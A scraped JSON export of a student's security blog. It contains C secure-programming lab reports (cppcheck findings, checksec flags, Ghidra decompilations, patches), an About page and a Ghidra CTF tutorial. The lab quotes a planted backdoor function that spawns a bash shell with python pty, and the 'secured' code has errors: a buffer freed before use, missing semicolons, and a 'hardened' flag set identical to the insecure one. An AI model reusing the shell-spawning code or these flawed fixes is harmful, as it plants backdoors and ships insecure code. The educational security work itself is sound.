\u0026ldquo;Y\u0026rdquo;, the comparison strcmp(buffer, \u0026ldquo;y\u0026rdquo;) would always evaluate to 1, causing the return to fail. This bug was fixed by changing the comparator to ||. Second, we didn\u0026rsquo;t evaluate the return value of strcmp(buffer, \u0026ldquo;Y\u0026rdquo;), so we introduced the expected result into the evaluation. The source code below in validation_functions.c is is vulnerable because we have the fnR function that give the users system root access on the terminal which is a priviledge escalation. The solution to this problem would be to either delete the code as its unused or excempt it from the executabe file during compilation.\n#include \u0026#34;action_functions.h\u0026#34; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; void fnr(void) { puts(\u0026#34;The door is locked.\u0026#34;); return; } void fngrt(void) { puts(\u0026#34;Opened.\u0026#34;); puts(\u0026#34;No root.\u0026#34;); return; } // To remove the vulnerability of the unused fnR function being in the executable, we will use the command Make sure it\u0026#39;s not in the compiled code using the flag -DIGNORE_FUNCTION #ifndef IGNORE_FUNCTION void fnR(void) { puts(\u0026#34;Opened.\u0026#34;); puts(\u0026#34;Be careful, you are ROOT !\\n\u0026#34;); int value = system(\u0026#34;/usr/bin/env PS1=\\\u0026#34;SUPPOSED ROOT SHELL \u0026gt; \\\u0026#34; python3 -c \u0026#39;import pty; pty.spawn([\\\u0026#34;/bin/bash\\\u0026#34;, \\\u0026#34;--norc\\\u0026#34;])\u0026#39;\u0026#34;); exit(value); } #endif The code snippet above shows the solution which adds the ifdef IGNORE_FUNCTION where IGNORE_FUNCTION is the flag we will pass to the compiler using the -D flag. This is the complete compilation command to use -DIGNORE_FUNCTION\nIn the main.c function, the atoi() function, which converts user input to an integer, has been deprecated. It also does not check for errors before converting the string to an integer. In the door-locker program, if the user inputs two different strings as input, the door would open. This vulnerability exists because we are using atoi(). To fix this vulnerability, we replaced the atoi() function with the strtol() function, which will throw an error if the input isn\u0026rsquo;t a valid number, as shown in the patched code below.\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026#34;action_functions.h\u0026#34; #include \u0026#34;validation_functions.h\u0026#34; int main(int argc, char * argv[]) { int check; int in0; int in1; if (argc == 3) { check = validate(argv); if (check == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); // Use strtol with error checking since atoi is deprecatted in0 = strol(argv[2]); in1 = strol(argv[1]); check = fnchck(in1, in0); if (check == 0xf) { fngrt(); } else { fnr(); } } else { fnr(); } check = 0; } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); check = 1; } return check; } How to avoid these mistakes in future. # The vulnerabilities identified and addressed in the source code highlight some of the security concerns we can introduce to our code. Below is a detailed plan of future the software development process to mitigate such mistakes before the code is released:\nUse Secure Coding Practices\nAlways validate and sanitize user input to prevent unexpected behavior. Use safer alternatives like fgets instead of gets or scanf to avoid buffer overflows. Dynamically allocate memory using malloc only when necessary. Always check for successful allocation using malloc or calloc and free the memory after use to prevent memory leaks in the code. Ensure Code Review and Auditing\nPeer review all new code for adherence to security guidelines. Use static analysis tools (e.g., SonarQube, Coverity) to identify vulnerabilities such as buffer overflows or use of unsafe functions. Periodically review older code to find unused functions, insecure patterns, and deprecated APIs, functions and dependencies and update them to the recommended functions. Remove unused functions or ensure they are excluded from compilation (e.g., through macros using ifdef). Enable Compiler Flags for Security\nUse flags like -D_FORTIFY_SOURCE=2 to add runtime checks for common string format vulnerabilities. Employ -DIGNORE_FUNCTION to exclude unused functions from the build. Use -fstack-protector-all flag to enables stack protection, including shadow stacks, for all functions. Use Linker Flags\nTo ensure the stack is non-executable (a key part of preventing exploit execution), you should also link with the -z noexecstack flag to mark the stack as non-executable using gcc -o my_program my_program.c -fstack-protector-all -fcf-protection - D Conclusion # This lab focused on enhancing the security of a C program by identifying and mitigating potential vulnerabilities using static code analysis and compiler/linker options. Through the use of cppcheck, we identified issues such as unsafe scanf() usage and variable scope problems. Additionally, we explored vulnerable compiler and linker options that could make the program susceptible to attacks like buffer overflows and memory corruption.\nBy applying secure coding practices and adjusting compilation settings, such as enabling stack protection, disabling executable stacks, and using modern C standards, we significantly improved the program’s security posture. We also addressed the buffer overflow vulnerability by replacing unsafe functions with safer alternatives like fgets() and dynamically allocating memory with proper bounds checks.\nThese enhancements not only mitigate common attack vectors but also enforce better coding standards and runtime safety, making the program more resilient to exploitation. Through this process, we reinforced the importance of secure programming practices, both in code and in the compilation process, to protect against malicious exploits.\nAdditionally, we found that the differences between the compared binaries of the two programs did not seem to be related to how the program was compiled. This led us to think that the source code might have been altered in some way, and may not have been identical to start with. However, it is also reasonable to consider that Ghidra’s interpretation of a binary file could vary, potentially influencing how the differences were observed.\nWe also had the opportunity to explore different compiler options in depth, particularly by utilizing the checksec function (from the manual). This provided valuable insights into various security features enabled or disabled by the compiler and further emphasized the importance of thoroughly reading the manual to understand the implications of different compiler flags. Understanding these options allows developers to make informed decisions about which security measures to apply during the compilation process, enhancing the overall security of the program.\n","date":"24 January 2025","permalink":"/njeri/posts/toctou_c/","section":"Posts","summary":"The objective of this lab is to build on our understanding of secure programming in C by analyzing, enhancing, and securing the functionality of the program from Project Lab 1, with a focus on identifying and mitigating vulnerabilities and improving resilience against attacks like fuzzing.\nThis lab focuses on identifying vulnerabilities in the source code, applying and validating patches, and proposing future best practices to prevent similar issues. Additionally, we will analyze the code using security analysis tools (cppcheck) to find out about the vulnerabilities in code. After compiling the project, we will inspect the resulting binary in Ghidra to identify similarities and differences, which will further inform our understanding of the program\u0026rsquo;s security and allow us to apply effective mitigations.","title":"Secure Programming in C: Buffer Overwrites and Overflows"},{"content":"","date":"24 January 2025","permalink":"/njeri/tags/secure-programming-lab/","section":"Tags","summary":"","title":"Secure Programming Lab"},{"content":"About # I\u0026rsquo;m a master\u0026rsquo;s student in the Erasmus Mundus CYBERUS program, specializing in software cybersecurity with a focus on AI safety and security. With 4+ years of experience in software development and QA engineering, I\u0026rsquo;m passionate about advancing AI security through rigorous research and collaboration.\nResearch Interests # My current interest is in trustworthy AI and ensuring systems are resilient to adversarial attacks. I\u0026rsquo;m particularly interested in:\nAdversarial Machine Learning: Studying poisoning attacks, model robustness, and defense mechanisms. LLM Security: Exploring alignment, prompt injection, and jailbreaking techniques. Android Penetration Testing: Ensuring the security of mobile apps. Through hands-on labs, I\u0026rsquo;ve worked on LLM alignment and jailbreaking using greedy coordinate descent optimization (implementing research from \u0026ldquo;Universal and Transferable Adversarial Attacks on Aligned Language Models\u0026rdquo;), and built adversarial-resistant malware classifiers for Android APKs.\nCurrent Focus # I\u0026rsquo;m currently deepening my understanding of transformer architectures and mechanistic interpretability through the ARENA course, while also pentesting vulnerable mobile applications. I\u0026rsquo;m seeking opportunities in AI safety and security fellowships to contribute to the development of trustworthy AI systems.\nExperience Highlights # Open Source Cybersecurity: I currently work with the AsyncAPI Initiative implementing security best practices including incident response plans, SBOMs, and GitHub security hardening (MFA, CodeQL, protected branches).\nSecurity Research: At Grenoble LIG Lab, I validated a privacy-preserving authentication protocol using ProVerif and built a DNSSEC-enabled server prototype with KnotDNS, researching FIDO key integration for enhanced security.\nSoftware Security Testing: My QA background across multiple companies (Gotu, Wattics/EnergyCAP, Brrng) developed my adversarial thinking and manual vulnerability assessment skills. I\u0026rsquo;ve conducted practical penetration tests (XSS, SQLi, CSRF, XXE, command injection) using Burp Suite and ZAP on DVWA and Juice Shop.\nTechnical Background # AI Security: Adversarial attacks, model robustness evaluation, LLM security\nSecurity Tools: Burp Suite, Metasploit, Wireshark, Ghidra, ZAP, Frida, ProVerif\nDevelopment: Python, Java, C/C++, PyTorch, TensorFlow\nCloud \u0026amp; DevOps: AWS, Docker, Kubernetes, GitHub Actions\nWhat I\u0026rsquo;m Looking For # I\u0026rsquo;m available for a 6-month thesis internship starting February 2026, ideally focused on adversarial machine learning, model robustness, or trustworthy AI evaluation. I\u0026rsquo;m also actively seeking AI safety and security fellowships to deepen my research contributions.\nGet in Touch # Feel free to reach out if you\u0026rsquo;re working on AI safety, adversarial ML, or security research—I\u0026rsquo;m always excited to collaborate and learn from others in the field.\nTechnical Writing - LinkedIn Learning SOC Level 1 / Web Hacking - TryHackMe 🛠 Skills # Programming Security Tools DevOps Documentation Testing C, C++ Splunk, Wireshark, OSINT AWS, Kubernetes, Docker Technical Writing Selenium, Puppeteer Java, Kotlin Bash Scripting Cypress Ruby on Rails, Python Manual Testing ✍️ Published Articles and Documentation # Open Source Contributions # Creating a Generator Template Generator Tool Introduction Installation Guide Usage Guide AsyncAPI Document Template Context Generator Version vs Template Version Articles # Mobile Regression Testing vs Unit Testing Explained Rails Excessive Data Exposure: Examples and Prevention Intro to cron and editing your crontab schedule ","date":"1 January 2025","permalink":"/njeri/about/","section":"","summary":"About # I\u0026rsquo;m a master\u0026rsquo;s student in the Erasmus Mundus CYBERUS program, specializing in software cybersecurity with a focus on AI safety and security. With 4+ years of experience in software development and QA engineering, I\u0026rsquo;m passionate about advancing AI security through rigorous research and collaboration.\nResearch Interests # My current interest is in trustworthy AI and ensuring systems are resilient to adversarial attacks. I\u0026rsquo;m particularly interested in:\nAdversarial Machine Learning: Studying poisoning attacks, model robustness, and defense mechanisms. LLM Security: Exploring alignment, prompt injection, and jailbreaking techniques. Android Penetration Testing: Ensuring the security of mobile apps. Through hands-on labs, I\u0026rsquo;ve worked on LLM alignment and jailbreaking using greedy coordinate descent optimization (implementing research from \u0026ldquo;Universal and Transferable Adversarial Attacks on Aligned Language Models\u0026rdquo;), and built adversarial-resistant malware classifiers for Android APKs.","title":""},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/buffer-overflow/","section":"Tags","summary":"","title":"BUffer Overflow"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/buffer-overwrites/","section":"Tags","summary":"","title":"Buffer Overwrites"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/c-programming/","section":"Tags","summary":"","title":"C Programming"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/coding101/","section":"Tags","summary":"","title":"Coding101"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/ctf/","section":"Tags","summary":"","title":"CTF"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/cyber-security/","section":"Tags","summary":"","title":"Cyber Security"},{"content":"","date":"1 December 2024","permalink":"/njeri/tags/ghidra/","section":"Tags","summary":"","title":"Ghidra"},{"content":"Reverse Engineering # Decompiling a program from assemnly back to high level language to try and understand what the program does.\nExample uses cases:\nVulnerability Analysis Malware Research Binary Analysis Tools Summary (Ghidra Book, Ch. 2) # 1. file # What: Identifies the file format (ELF, PE, Mach-O), architecture (x86, ARM), and bit-width (32/64-bit). When: Step 1 (Triage). Use it the moment you receive a mystery file. Why vs Others: Use this instead of nm or objdump initially because it tells you if the file is even an executable or if it is \u0026ldquo;stripped\u0026rdquo; (missing names). Example Command: file \u0026lt;filename\u0026gt; 2. strings # What: Scans the entire file for sequences of printable characters (ASCII/Unicode). When: Initial Recon. Use it to find hardcoded passwords, IP addresses, URLs, or developer comments. Why vs Others: Unlike nm, which only looks at official \u0026ldquo;names\u0026rdquo; (symbols), strings finds human-readable text hidden anywhere in the binary\u0026rsquo;s raw data. Example Command: strings -a \u0026lt;filename\u0026gt; 3. nm # What: Lists the \u0026ldquo;Symbol Table\u0026rdquo;—the names of functions and global variables used in the code. When: Function Discovery. Use it to find the main entry point or identify specific logic like validate_key. Why vs Others: It provides a much cleaner \u0026ldquo;Table of Contents\u0026rdquo; than objdump. If you just need a list of functions without seeing the code, this is the fastest tool. Example Command: nm -D \u0026lt;filename\u0026gt; 4. ldd # What: Prints the shared libraries (dependencies) that the program needs to run. When: Dependency Analysis. Use it to see what external tools the program relies on (e.g., encryption or networking libraries). Why vs Others: Unlike readelf, ldd shows you exactly where those libraries are located on your specific system. Example Command: ldd \u0026lt;filename\u0026gt; 5. objdump # What: The \u0026ldquo;Swiss Army Knife\u0026rdquo; for displaying headers, section info, and raw disassembly. When: Deep Dive (CLI). Use it when you want to see the actual assembly code without opening a GUI like Ghidra. Why vs Others: It is the only tool in this list that can actually disassemble machine code into human-readable assembly instructions. Example Command: objdump -d \u0026lt;filename\u0026gt; 6. readelf # What: Displays extremely detailed technical information about the ELF (Linux) file header and sections. When: Structure Analysis. Use it to find the exact memory addresses of the .text (code) or .data (variables) sections. Why vs Others: It is safer than ldd because it only reads the file header and never attempts to execute any part of the binary. Example Command: readelf -h \u0026lt;filename\u0026gt; NOTE: If a binary is Stripped, nm will fail. Your best alternatives are then strings (to find text clues) or objdump -d (to manually read the assembly logic).\nReversing with GHIDRA # Challenge 1 # Reverse Engineering CBM hacker\u0026rsquo;s easy_reverse with Ghidra. After unzipping the file and getting access to the executable I ran it with the command ./rev50_linux64-bit and see that it expects me to pass the password as an argument:\nI then decompiled the excecutrable file using Ghidra and selected the main function from the Symbol Tree which loads the decompiled main function code in the Decompiled Window as shown below:\nI proceed to change the main undefuined signature above to the C standard signature int main(int argc, char *argv[]).\nThe code now looks much cleaner and easy to read so I proceeded to analyze the code while adding comments:\n1. The Argument Count (argc) # First, the program checks if two arguments are passed usingargc == 2 where argv[0] is the name of the program in C. Therefore, argc == 2 means the program expects exactly one user-provided argument. If you run the program without an argument, it calls the usage function and exits.\n2. The String Length # Next, it checks the length of the user input using strlen to ensure it is exactly 10 characters long arg1_len == 10.\n3. The Character Check # This is the specific requirement argv[1][4] == '@' that checks if the 5th character of the user provided input is an @ symbol\nGiven this information we are able to deduce how to obtain the flag by crafting an argument that satistifies all the conditions listed above as shown in the following screenshot:\nChallenge 2 # After running the second challenge, I saw that the program requires a password in order to run. I then decompiled the executable using Ghidra\n","date":"1 December 2024","permalink":"/njeri/posts/reverse_engineering/","section":"Posts","summary":"Reverse Engineering # Decompiling a program from assemnly back to high level language to try and understand what the program does.\nExample uses cases:\nVulnerability Analysis Malware Research Binary Analysis Tools Summary (Ghidra Book, Ch. 2) # 1. file # What: Identifies the file format (ELF, PE, Mach-O), architecture (x86, ARM), and bit-width (32/64-bit). When: Step 1 (Triage). Use it the moment you receive a mystery file. Why vs Others: Use this instead of nm or objdump initially because it tells you if the file is even an executable or if it is \u0026ldquo;stripped\u0026rdquo; (missing names). Example Command: file \u0026lt;filename\u0026gt; 2.","title":"Reverse Engineering"},{"content":"Introduction # The objective of this lab is to build on our understanding of secure programming in C by analyzing, enhancing, and securing the functionality of the program from Project Lab 1, with a focus on identifying and mitigating vulnerabilities and improving resilience against attacks like fuzzing.\nThis lab focuses on identifying vulnerabilities in the source code, applying and validating patches, and proposing future best practices to prevent similar issues. Additionally, we will analyze the code using security analysis tools (cppcheck) to find out about the vulnerabilities in code. After compiling the project, we will inspect the resulting binary in Ghidra to identify similarities and differences, which will further inform our understanding of the program\u0026rsquo;s security and allow us to apply effective mitigations. The goal is to deliver a secure, improved program with a detailed report on the analysis, changes, and recommendations.\nAnalysis Method (cppcheck) # Since we are provided with a source code, we try to identify potential threats in the code with a static code analysis tool- cppcheck.\nFirst, we extract the provided files using the given instructions. We run cppcheck on the program and we identified the following threats: Variable Scope Issues: The variables in0 and in1 in src/main.c have unnecessarily wide scopes, which may lead to unintended use or harder code maintenance. Unsafe Use of scanf(): In src/validation/validation_functions.c, scanf(\u0026quot;%s\u0026quot;, buffer) lacks a field width limit, making it vulnerable to buffer overflows if provided with excessively large input. Unused Function: The function fnR in src/action/action_functions.c is never called, indicating potential dead code, which can increase codebase complexity or lead to latent issues if not properly reviewed. Given the program\u0026rsquo;s small size, we can conduct manual security code reviews against secure coding standards and write test programs to identify common vulnerabilities. However, since we use a Makefile to efficiently compile and run multiple files together, manually reviewing each file one by one becomes impractical in real-world scenarios. Therefore, we propose starting with static analysis for a more efficient and thorough approach. Legacy Options # Finding the Original Compiler Options (LEGCFLAGS) Leading to Vulnerabilities # checksec is a Linux tool that analyzes binary files to identify security features implemented during compilation and linking, such as RELRO, NX, PIE, Stack Canary, and FORTIFY_SOURCE. To infer the LEGCFLAGS (Linux Exploit GDB Compiler Flags) used in the door-locker binary from the given checksec output, we analyze the provided information step by step: Breakdown of checksec Output: # RELRO: Partial RELRO Indicates that the binary is compiled with Wl,-z,relro but not with Wl,-z,now. This provides partial protection against GOT overwrite attacks. At first we only configured with -z,relro -Wl, however it would always still be fully enabled, thus we suspected that this configuration is applied by default, thus we have to take an extra step to disable it with -Wl,-z,lazy to enforce lazy symbol resolution, which is required for Partial RELRO. STACK CANARY: No canary found Suggests the binary was not compiled with fstack-protector or similar flags. This makes it vulnerable to stack-based buffer overflows. NX (No Execute): Enabled The binary is compiled with Wl,-z,noexecstack or equivalent, which prevents code execution on the stack. PIE (Position-Independent Executable): Enabled Indicates the binary was compiled with fPIE -pie. This allows address randomization, enhancing security against exploits. RPATH and RUNPATH: Not set The binary has no hardcoded runtime library search paths, indicating good practice. Symbols: (45) Symbols Indicates the binary includes some debug symbols or symbol table information, possibly due to compilation with g or no stripping of symbols. FORTIFY: No The binary lacks fortification, thus we configured it explicitly as D_FORTIFY_SOURCE=0. Likely Legacy Options: # Based on the above, the likely compiler flags are:\nLEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack Checksecafter making the program and got the identical security configuration result as the binary file provided in Lab 1. These flags explain the security features observed:\nfPIE -pie: For PIE enabled. These flags enable Position-Independent Executable (PIE), making the executable\u0026rsquo;s code location-independent, which allows the OS to load it at different memory addresses for better security (such as enabling Address Space Layout Randomization, ASLR). D_FORTIFY_SOURCE=0: For No Fortify. This disables the FORTIFY_SOURCE security feature, which normally enhances the security of certain string and memory operations by checking for buffer overflows at compile time. fno-stack-protector: For No Canary Found. This flag disables stack protection mechanisms (canary values) that are used to detect and prevent stack buffer overflows during execution. Wl,-z,relro \u0026amp; -Wl,-z,lazy : For Partial RELRO. The -z,relro flag enables a form of read-only relocation (RELRO) to protect the Global Offset Table (GOT) from modification, while -z,lazy ensures that symbol resolution is deferred until needed, allowing for Partial RELRO. Wl,-z,noexecstack: For NX enabled. This flag prevents the stack from being executable, mitigating the risk of certain types of attacks, such as buffer overflows that attempt to execute code from the stack (NX or No Execute protection). Analyze Binary in Ghidra # Compilation options used for LEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack Original Binary for main function (Lab 1) int main(int argc,char **argv) { long lVar1; long lVar2; int iVar3; if (argc == 3) { iVar3 = validate(argv); if (iVar3 == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); lVar1 = strtol(argv[2],(char **)0x0,10); lVar2 = strtol(argv[1],(char **)0x0,10); iVar3 = 0; if (lVar2 == lVar1) { puts(\u0026#34;Valid access.\u0026#34;); fngrt(); } else { fnr(); } } else { fnr(); iVar3 = 0; } } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); iVar3 = 1; } return iVar3; } New Binary for main function (Lab 2) int main(int argc,char **argv) { int iVar1; int iVar2; long lVar3; long lVar4; if (argc == 3) { iVar1 = validate(argv); if (iVar1 == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); lVar3 = strtol(argv[2],(char **)0x0,10); lVar4 = strtol(argv[1],(char **)0x0,10); iVar2 = fnchck((int)lVar4,(int)lVar3); iVar1 = 0; if (iVar2 == 0xf) { fngrt(); } else { fnr(); } } else { fnr(); iVar1 = 0; } } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); iVar1 = 1; } return iVar1; } Overview # Two binary files, produced from slightly differing versions of source code, were analyzed. Despite identical checksec results indicating similar security configurations, functional discrepancies were observed. This report outlines the differences, potential causes, and investigative steps taken to identify the reasons behind the variations.\nKey Observations # Logic Differences in Validation:\nFirst Binary: Directly compares two long values using if (lVar2 == lVar1) to determine success. fnchck is included in the project but never called. Second Binary: Introduces a new function, fnchck, which takes the casted integer values of lVar3 and lVar4 as arguments. Success is determined by the condition if (fnchck(...) == 0xf). Finding: The second binary includes an additional layer of logic not present in the first.\nVariable Usage and Type Casting:\nBoth binaries use long variables for storing input values. The second binary explicitly casts these long values to int when calling fnchck. Finding: Type casting was introduced in the second binary, potentially as part of an additional validation mechanism.\nCommon Functionality:\nBoth binaries call fngrt() upon success and fnr() upon failure. However, the success criteria differ due to the logic variations described above. Finding: Core functionality remains similar, but validation mechanisms differ.\nPotential Causes of Differences # Source Code Variations: The inclusion of fnchck in the second binary suggests either a different version of the source code or manual modification. Conditional Compilation: Preprocessor directives such as #ifdef or #define may have enabled or disabled specific sections of code during compilation. Compiler or Optimization Settings: Compiler flags (e.g., O2, O3) may have introduced optimizations or modifications in one binary but not the other. However, optimizations typically simplify logic rather than adding new functions like fnchck. Linker Behavior or Library Dependencies: Differences in the linker scripts, library versions, or included dependencies might have affected the compiled output. Possible Next Investigative Steps # Compilation Flags: The compilation process for both binaries was analyzed with verbose options (gcc -v and ld --verbose) to identify differences in flags. Special attention was paid to optimization levels and security-related flags. Disassembly Analysis: Using objdump -d, the assembly-level differences between the two binaries were reviewed. This revealed the introduction of fnchck and its associated logic in the second binary. Preprocessor Directives: The source code was inspected for conditional compilation directives (e.g., #ifdef) that could enable or disable sections of the code. Controlled Recompilation: Various combinations of compiler and linker flags were tested to replicate the logic in both binaries, including: Adjusting optimization levels (O0, O2, O3). Explicitly enabling or disabling RELRO (Wl,-z,relro or Wl,-z,now). Original Binary for validate function (Lab 1)\nvoid validate(int param_1) { char local_20 [24]; printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;,*(undefined4 *)(param_1 + 4), *(undefined4 *)(param_1 + 8)); __isoc99_scanf(\u0026amp;DAT_00012057,local_20); strcmp(local_20,\u0026#34;Y\u0026#34;); return; } New Binary for validate function (Lab 2) int validate(char **argv) { uint uVar1; int iVar2; char buffer [20]; printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;,argv[1],argv[2]); __isoc99_scanf(\u0026amp;DAT_0010204b,buffer); uVar1 = strcmp(buffer,\u0026#34;Y\u0026#34;); if (uVar1 != 0) { iVar2 = strcmp(buffer,\u0026#34;y\u0026#34;); uVar1 = (uint)(iVar2 != 0); } return uVar1; } The primary differences seems to be due to code-level changes rather than compiler flags differences. However, certain flags like -fstack-protector, -O2, or -O3 could potentially influence buffer allocation, optimization, or even removal of unused code, but they are not directly responsible for the changes in logic and structure between the two versions. The second version appears to be a more robust implementation, checking both uppercase and lowercase \u0026quot;Y\u0026quot; inputs and correctly using the result of the comparison.\nSecured Makefile Configuration # 1. LEGCFLAGS = -fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector # fpie: This flag enables the creation of position-independent executables (PIE). This improves security by enabling Address Space Layout Randomization (ASLR), making it harder for attackers to predict the memory layout of a program. D_FORTIFY_SOURCE=0: This disables the \u0026ldquo;fortify\u0026rdquo; source feature, which provides additional compile-time checks to enhance security. By setting this to 0, the program won\u0026rsquo;t benefit from additional security features such as bounds checking for certain functions like strcpy, memcpy, etc. Recommendation: Remove this flag or set it to 2 (the highest level of fortification). Setting it to 0 reduces the security checks and can make your application more vulnerable to buffer overflow attacks. fno-stack-protector: This disables stack protection, which is typically used to detect and prevent buffer overflow attacks by placing \u0026ldquo;canaries\u0026rdquo; on the stack. Recommendation: Remove this flag. Disabling stack protection weakens security by making it easier for attackers to exploit stack buffer overflows. Keep fstack-protector or use fstack-protector-strong (which is a more secure version). 2. LEGLDFLAGS = -pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack # pie: This flag creates a position-independent executable, which works together with ASLR to randomize the memory layout, improving security. Wl,-z,relro: This flag enables \u0026ldquo;Read-Only Relocation\u0026rdquo; (RELRO), which makes it harder for an attacker to modify function pointers after the program starts. It improves security by making certain sections of memory read-only after the relocation phase. Wl,-z,lazy: This flag instructs the linker to delay symbol resolution until the symbol is actually used. This can make the program load more efficiently, but it could make it easier for an attacker to exploit any unresolved symbols before they are properly bound. Recommendation: Remove this flag. It introduces a potential risk because unresolved symbols could be hijacked before the program fully resolves them, weakening security. Wl,-z,noexecstack: This flag marks the stack as non-executable, which prevents code from being executed on the stack. This helps mitigate attacks like buffer overflows that try to execute shellcode on the stack. Recommendation: Keep this flag. It is an essential security feature that helps prevent stack-based code execution vulnerabilities. Security Enhancements Summary: # Remove D_FORTIFY_SOURCE=0: Reinstate compiler security checks for bounds checking and other safeguards by setting it to 2. Remove fno-stack-protector: Keep stack protection enabled to defend against stack overflow attacks. Remove Wl,-z,lazy: Avoid lazy symbol resolution to reduce potential vulnerabilities related to unresolved symbols. Keep Wl,-z,noexecstack and pie: These flags enhance security by preventing stack execution and enabling position-independent executables. The proposed secured configuration:\nLEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack When trying to build the make file with a secured configuration, we discovered that there will be a warning that stop the code from building, thus we added a bypass to that specific warning: -Wno-unused-result . Since we were merely trying to see how the mitigation in compilation level carry out, we ignore this code level error. Successfully built the program after bypassing -Wno-unused-result error. Try to carry out the buffer over flow attack again but could see that the attack is detected and terminated. How It Enhances Security # Memory Safety: Prevents stack-based buffer overflows (fstack-protector-strong). Disallows execution of code on the stack (z noexecstack). Exploit Mitigation: ASLR support makes memory addresses unpredictable (fpie, pie). RELRO ensures critical relocation structures are immutable (Wl,-z,relro -Wl,-z,now). Improved Code Quality: Enforces secure coding standards and flags potential vulnerabilities during compilation (Wall -Wextra -Werror). Runtime Safety: Uses trusted library paths and avoids unsafe or unverified libraries. In order to prevent the buffer overflow and lack of user input validation vulnerabilities discovered, we patched thevalidation_functions.c source code as shown below\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026#34;validation_functions.h\u0026#34; int fnchck(int a, int b) { int check; if (b == a) { puts(\u0026#34;Valid access.\u0026#34;); check = 0xf; } else { check = 0; } return check; } int validate(char * argv[]) { // Use malloc to dynamically allocate memory at runtime char *buffer = (char *)malloc(20); printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;, argv[1], argv[2]); // Use fgets to read the user input since it only writes upto the buffer size thus preventing buffer overflow fgets(buffer, 20, stdin) // Free the allocated memory free(buffer) // Return 0 if buffer == \u0026#34;Y\u0026#34; or buffer == \u0026#34;y\u0026#34; return (strcmp(buffer, \u0026#34;Y\u0026#34;) == 0) || (strcmp(buffer, \u0026#34;y\u0026#34;) == 0); } How to patch the vulnerabilities above # The source code below is the patched code of validation_functions.c\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026#34;validation_functions.h\u0026#34; int fnchck(int a, int b) { int check; if (b == a) { puts(\u0026#34;Valid access.\u0026#34;); check = 0xf; } else { check = 0; } return check; } int validate(char * argv[]) { // Use malloc to dynamically allocate memory at runtime char *buffer = (char *)malloc(20); printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;, argv[1], argv[2]); // Use fgets to read the user input since it only writes upto the buffer size thus preventing buffer overflow fgets(buffer, 20, stdin) // Free the allocated memory free(buffer) // Return 0 if buffer == \u0026#34;Y\u0026#34; or buffer == \u0026#34;y\u0026#34; return (strcmp(buffer, \u0026#34;Y\u0026#34;) == 0) || (strcmp(buffer, \u0026#34;y\u0026#34;) == 0); } The code above does the following:\nchar *buffer = (char *)malloc(20); will dynamically assign memory to our buffer at run time. This allows memory to be allocated at random addresses when ASLR is active. fgets(buffer, 20, stdin). fgets is more secure compared to scanf. The fgets function ensures that no more than 19 characters are read, preventing buffer overflow when saving the input to buffer and leaving space for the null terminator. return (strcmp(buffer, \u0026quot;Y\u0026quot;) == 0) || (strcmp(buffer, \u0026quot;y\u0026quot;) == 0). The initial return function had two issues. First, it used the \u0026amp;\u0026amp; comparator, which meant that if the user inputs \u0026ldquo;Y\u0026rdquo;, the comparison strcmp(buffer, \u0026ldquo;y\u0026rdquo;) would always evaluate to 1, causing the return to fail. This bug was fixed by changing the comparator to ||. Second, we didn\u0026rsquo;t evaluate the return value of strcmp(buffer, \u0026ldquo;Y\u0026rdquo;), so we introduced the expected result into the evaluation. The source code below in validation_functions.c is is vulnerable because we have the fnR function that give the users system root access on the terminal which is a priviledge escalation. The solution to this problem would be to either delete the code as its unused or excempt it from the executabe file during compilation.\n#include \u0026#34;action_functions.h\u0026#34; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; void fnr(void) { puts(\u0026#34;The door is locked.\u0026#34;); return; } void fngrt(void) { puts(\u0026#34;Opened.\u0026#34;); puts(\u0026#34;No root.\u0026#34;); return; } // To remove the vulnerability of the unused fnR function being in the executable, we will use the command Make sure it\u0026#39;s not in the compiled code using the flag -DIGNORE_FUNCTION #ifndef IGNORE_FUNCTION void fnR(void) { puts(\u0026#34;Opened.\u0026#34;); puts(\u0026#34;Be careful, you are ROOT !\\n\u0026#34;); int value = system(\u0026#34;/usr/bin/env PS1=\\\u0026#34;SUPPOSED ROOT SHELL \u0026gt; \\\u0026#34; python3 -c \u0026#39;import pty; pty.spawn([\\\u0026#34;/bin/bash\\\u0026#34;, \\\u0026#34;--norc\\\u0026#34;])\u0026#39;\u0026#34;); exit(value); } #endif The code snippet above shows the solution which adds the ifdef IGNORE_FUNCTION where IGNORE_FUNCTION is the flag we will pass to the compiler using the -D flag. This is the complete compilation command to use -DIGNORE_FUNCTION\nIn the main.c function, the atoi() function, which converts user input to an integer, has been deprecated. It also does not check for errors before converting the string to an integer. In the door-locker program, if the user 